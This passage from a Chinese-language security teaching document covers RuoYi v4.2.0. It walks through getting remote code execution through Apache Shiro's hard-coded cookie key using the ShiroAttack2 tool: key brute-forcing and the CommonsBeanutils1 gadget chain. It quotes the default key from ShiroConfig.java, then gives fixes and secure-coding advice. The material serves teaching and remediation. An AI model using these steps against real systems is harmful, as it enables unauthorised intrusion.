漏洞复现<\/strong><\/h5> 使用攻击工具：<\/strong> 如 ShiroAttack2<\/code>。<\/li> 输入目标URL。<\/strong><\/li> 选择检测\/利用：<\/strong> 工具会自动检测Shiro版本并使用相应的加密方式（v4.2.0的Shiro为1.4.2，使用AES-GCM加密）。<\/li> 爆破密钥：<\/strong> 工具会利用默认密钥库进行爆破，成功后会显示密钥。<\/li> 利用：<\/strong> 选择利用链（如CommonsBeanutils1），填写要执行的命令，即可获得RCE。<\/li> <\/ol> 2.5.3 代码审计追踪<\/strong><\/h5> 密钥位置：<\/strong> 在 ShiroConfig.java<\/code> 配置类中，可以找到硬编码的密钥 fCq+\/xWjdhSACJMLPDqZnQ==<\/code>。 cookie.<\/span>setCipherKey<\/span>(<\/span>Base64.<\/span>decode<\/span>(<\/span>"fCq+\/xWjdhSACJMLPDqZnQ=="<\/span>));<\/span> <\/span><\/span><\/code><\/pre><\/li> 此默认密钥是公开的，直接导致了漏洞。<\/li> <\/ul> 2.5.4 修复方案<\/strong><\/h5> 官方修复方案是升级Shiro到安全版本，并在配置中生成一个随机的、强壮的密钥替换掉默认密钥。<\/p> 第三章：总结与修复建议<\/strong><\/h3> 核心安全启示：<\/strong><\/p> 永不信任用户输入：<\/strong> 所有漏洞的根本原因都是对用户输入的数据没有进行严格的校验和过滤。<\/li> 最小化组件使用风险：<\/strong> 谨慎选择和使用第三方组件（如Fastjson、Shiro），并及时更新到安全版本。<\/li> 遵循安全编码规范：<\/strong> 使用预编译（#{}<\/code>）替代字符串拼接（${}<\/code>）；对文件路径进行规范化校验；对反射调用进行严格的类名、方法名白名单控制。<\/li> <\/ol> 针对RuoYi v4.2.0的修复路径：<\/strong> 最根本的方法是升级到最新官方安全版本<\/strong>。新版本已修复上述所有漏洞。<\/p> 本教学文档完。请务必在隔离的测试环境中进行实践，切勿用于任何非法用途。<\/p>